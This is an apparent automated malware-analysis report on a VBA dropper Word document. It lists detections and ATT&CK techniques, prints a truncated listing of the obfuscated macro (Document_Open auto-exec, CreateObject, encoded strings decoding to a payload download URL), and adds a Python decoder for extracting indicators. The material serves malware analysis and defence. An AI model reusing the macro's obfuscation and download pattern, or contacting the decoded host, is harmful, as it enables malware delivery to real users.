Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious Office document carrying VBA macros with a Document_Open auto-execution entry point, so the code runs as soon as a user opens the file with macros enabled. Heuristics flag CreateObject (visible in the extracted source, wrapped by SrpCB) and CallByName, the usual late-binding pair for instantiating COM objects and invoking their members by name without leaving clear-text method calls in the source. The ClamAV signature Doc.Dropper.Donoff-5743527-0 classifies the document as a dropper. The extracted source is heavily obfuscated (junk routines, random identifiers, numeric decoy arguments), but the live path is short: Document_Open calls HbvpnFGXMtrPD.QkFqo, which reaches RZbWCYRVhWMa and passes the result of qHPUHHm into ZXuGQCUOW. qHPUHHm and JDRtoJeGQ both return strings produced by LijYrJ.CZjnJSVjPfZqzm, a character-filter decoder: every character of the first argument that also occurs in the second argument is dropped, and the rest are kept in order. Applying that rule to the three literals in the preview yields a download URL (hxxp://ncb-trends[.]com/catalog/office12.dat, defanged here), the string ResponseBody, and the message "Can't download binary file", which is consistent with the document fetching a second-stage payload over HTTP and executing it; the code that would write and launch the payload lies past the truncation point, so that last step is an inference from the visible strings rather than from observed code. The p-code heuristic adds that the compiled VBA stream carries the same auto-exec and execution tokens, so the verdict does not depend on the decompiled source alone.
Heuristics (7)
- ClamAV: Doc.Dropper.Donoff-5743527-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro, an auto-execution entry point that runs when the document is opened with macros enabled
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  All five are XML namespace URIs (RDF, Adobe XMP, OOXML DrawingML) left behind in embedded metadata and are not network indicators. The macro's own download URL is not in this list because it is stored obfuscated in the VBA source and only appears after running the string decoder (CZjnJSVjPfZqzm in the preview below).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17635 bytes | c66503505feb07d50ec5c2508301703f49e02e624d229e01cbf53970ddb82298 |

Preview: first 1,000 lines of the extracted script (the listing below is cut short by the analyzer)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function PMmxnB(ByVal FMMPVHTbw As Integer) As String
UQFTEy
wzWDv 8198
If lrvLdCj(8828, "") Then
jBIjNyouvmDjuZ
UMKsc = 7276
amcOQBVMAHQ 4905, "BA"
uulJVwWV
End If
uwxKqoYt = "57t0"
PMmxnB = ""
End Function
Private Function LHdoeDF() As Integer
kWkvKF False
UMvSTEjQQtdo 2233, ""
kYNuKdGcXy
LHdoeDF = 5204
End Function
Private Function sFFKohPr() As String
If SxAYB(9126) Then
VpjxxxILBU = 8634
ReScrY
Else
dvLltDAdr True
tlBKZc
PscOoNlivvjVe
End If
XxaKlBBEiwsB = True
sFFKohPr = "Znk"
End Function
Private Sub Document_Open()
HbvpnFGXMtrPD.QkFqo
End Sub
Private Function qVXMxGRegfq(ByVal rWOwHQqHKEIHX As String, ByVal VRQsIciOFZgIV As Integer) As Integer
CRJJtMFDJXlSIv 4374
vQXPlmS
DfSEQeDrzhEE
If DZfYDwaRcn Then
tCYnVJvhlUbR
Else
iBxlTeQUcPmwG = ""
hkXdcPpzrWS
MlSmVFiCZf
End If
qVXMxGRegfq = 1337
End Function
Attribute VB_Name = "HbvpnFGXMtrPD"
Private Function QpWQFGO(ByVal HdAnWlaNIz As Object, ByVal VhyKwMEeN As Boolean) As Object
Dim adepRLp As Integer
vnaswLCkTAZh = False
Set QpWQFGO = HdAnWlaNIz
End Function
Public Sub QkFqo()
On Error GoTo pDLFwlKautcQv
TPZzicDvM.rJJMTEZVP
PWSGB = True
TPZzicDvM.EPGTLXwCepyQ
RZbWCYRVhWMa
Exit Sub
BRzeBNhLSKGhf = 5724
pDLFwlKautcQv:
End Sub
Private Sub RZbWCYRVhWMa()
Dim hdFkI As String
Dim waIpRGWDZiRe As Integer
KNURYpuv = "Cw"
ZXuGQCUOW 5737, nsqBpxK.apOMYUw, qHPUHHm
bgvzJHkcMGqd = 6867
nsqBpxK.HoCPV 6258, nsqBpxK.apOMYUw
End Sub
Public Function SrpCB(ByVal RQLDuur As String) As Object
Dim tlwrSv As String
Dim NQxbFmonX As Boolean
LsmbtnVaksC = "oVvzn"
Set SrpCB = QpWQFGO(CreateObject(RQLDuur), True)
End Function
Private Function bEYHoKcHI(ByVal gytdmwj As String) As Integer
If DSOTwUvjFiW(8404, "FDcHA") Then
lBNwQhEt = 7354
ARxoWvRulT
jFFDZi
XZDnw
HwKBuwX = "iVM"
Else
cyzPYW
xqCEcfekpEWtTP "KZp", 4897
xQuuTxZDMmO
End If
lIlymvSKqzN 4147, 3708, 9625
bEYHoKcHI = 2465
End Function
Private Sub ZXuGQCUOW(ByVal AKplpwFHFBvr As Integer, ByVal znUaXPfMQqo As String, ByVal HZnqo As String)
Dim kzbVg As Integer
Set yLqnaN = OwMnAVyJ.AvuZz(HZnqo, 7913, True)
OwMnAVyJ.hIBgm "oCs", JDRtoJeGQ, 3895, yLqnaN
tkEPgwXr = True
nsqBpxK.NhxrDRHkVbw 6655, cOZDtT.zUAarF(2621, yLqnaN, "nSi4O", LijYrJ.CZjnJSVjPfZqzm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "kQ", znUaXPfMQqo
End Sub
Private Function qHPUHHm() As String
qHPUHHm = LijYrJ.CZjnJSVjPfZqzm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function JDRtoJeGQ() As String
JDRtoJeGQ = LijYrJ.CZjnJSVjPfZqzm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "LijYrJ"
Private Sub fddPCUYJMJ()
LhxQglFUR False, 4187, False
EPaZwUdx 3928, True, 3091
End Sub
Public Function rEaAElxyfPRvw(ByVal vbetFjDhruWIG As String, ByVal UinSduCp As Boolean, ByVal bChUKHQI As String) As String
Dim DLntgTr As Boolean
Dim GPxvkuEqdAV As Integer
dZLDAaaeOy = "eHSwY"
rEaAElxyfPRvw = vbetFjDhruWIG & bChUKHQI
End Function
Private Sub VDrOyaJjBw()
EBuRN 3835, "A", 8764
UPzME 5484, 760, 7177
qxkogahArxVjV = 3182
rQKlPmTTawfTE
End Sub
Private Function RMzXT(ByVal ADwMbXO As String, ByVal LGaXEhswwT As String) As String
If Not nPZax.PtuRIatqtAwkod("m2M8", LGaXEhswwT, ADwMbXO, "") Then
RMzXT = LGaXEhswwT
End If
End Function
Private Function QNLYGBuSjDvViA() As Integer
KAaLYjQi = ""
QNLYGBuSjDvViA = 1
End Function
Public Function CZjnJSVjPfZqzm(ByVal zEGRICsR As String, ByVal WyWDSJBJ As String) As String
Dim FosfRcjYbP As String
Dim dGpNzOAbdA As String
Dim ltCOeYkF As Integer
For gGvYm = QNLYGBuSjDvViA To nPZax.GFvBV(zEGRICsR)
FosfRcjYbP = RMzXT(WyWDSJBJ, nPZax.yGSfVZOhjYZLTf(zEGRICsR, 9996, gGvYm, True))
CZjnJSVjPfZqzm = rEaAElxyfPRvw
... (truncated)
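The following is an added example, not code from the report or from the sample: a re-implementation of the string decoder seen in the preview (LijYrJ.CZjnJSVjPfZqzm) plus a small scanner that pulls every literal call to it out of the extracted source and decodes it. It assumes, from the truncated listing, that nPZax.GFvBV behaves like Len, that nPZax.yGSfVZOhjYZLTf(s, _, i, _) behaves like Mid(s, i, 1), and that nPZax.PtuRIatqtAwkod(_, key, c, _) is true when c occurs in key under a case-sensitive (binary) compare; with those readings RMzXT keeps a character only when it is absent from the key and rEaAElxyfPRvw appends it. The sample input is the three decoder calls copied from the preview.

```python
"""Decoder for the character-filter obfuscation used by the extracted macro.

Assumptions inferred from the truncated VBA preview (not confirmed by the page):
  nPZax.GFvBV(s)                   ~ Len(s)
  nPZax.yGSfVZOhjYZLTf(s, _, i, _) ~ Mid(s, i, 1)
  nPZax.PtuRIatqtAwkod(_, key, c, _) ~ True when c occurs in key (case-sensitive)
Under those assumptions CZjnJSVjPfZqzm(encoded, key) keeps every character of
`encoded` that does not occur in `key`, in the original order.
"""
from __future__ import annotations

import re


def decode_filtered(encoded: str, key: str) -> str:
    """Drop every character of `encoded` that occurs in `key`; keep the rest in order."""
    drop = set(key)  # VBA default compare is binary, so 'R' and 'r' are distinct
    return "".join(ch for ch in encoded if ch not in drop)


# Matches CZjnJSVjPfZqzm("<encoded>", "<key>") where both arguments are string literals.
_DECODER_CALL = re.compile(r'CZjnJSVjPfZqzm\("([^"]*)"\s*,\s*"([^"]*)"\)')


def decode_calls(vba_source: str) -> list[dict[str, str]]:
    """Find every literal decoder call in the source and attach its decoded value."""
    return [
        {"encoded": enc, "key": key, "decoded": decode_filtered(enc, key)}
        for enc, key in _DECODER_CALL.findall(vba_source)
    ]


_URL = re.compile(r"https?://[^\s\"']+")


def network_indicators(vba_source: str) -> list[str]:
    """Decoded strings that are URLs: candidate IOCs to pivot on, not to visit."""
    return [h["decoded"] for h in decode_calls(vba_source) if _URL.fullmatch(h["decoded"])]


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked by accident: hxxp scheme, [.] in the host."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}{sep}{path}"


# Constructed sample: the three decoder calls copied verbatim from the preview above.
SAMPLE_VBA = r'''
nsqBpxK.NhxrDRHkVbw 6655, cOZDtT.zUAarF(2621, yLqnaN, "nSi4O", LijYrJ.CZjnJSVjPfZqzm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "kQ", znUaXPfMQqo
qHPUHHm = LijYrJ.CZjnJSVjPfZqzm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
JDRtoJeGQ = LijYrJ.CZjnJSVjPfZqzm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
'''

if __name__ == "__main__":
    for hit in decode_calls(SAMPLE_VBA):
        print(f'{hit["key"]!r:<14} -> {hit["decoded"]!r}')
    for url in network_indicators(SAMPLE_VBA):
        print("indicator:", defang(url))
```

Run against the full macros.bas rather than the three-line sample, the scanner lists every string the macro decodes at runtime, which is usually enough to recover the download URL, the COM member names passed to CallByName and any drop path without stepping the macro in a sandbox. Two caveats: the regex only catches calls whose arguments are literals (a call that builds its arguments from other calls needs manual follow-up), and the decoded domain is an indicator to search for in proxy and DNS logs, not an address to fetch.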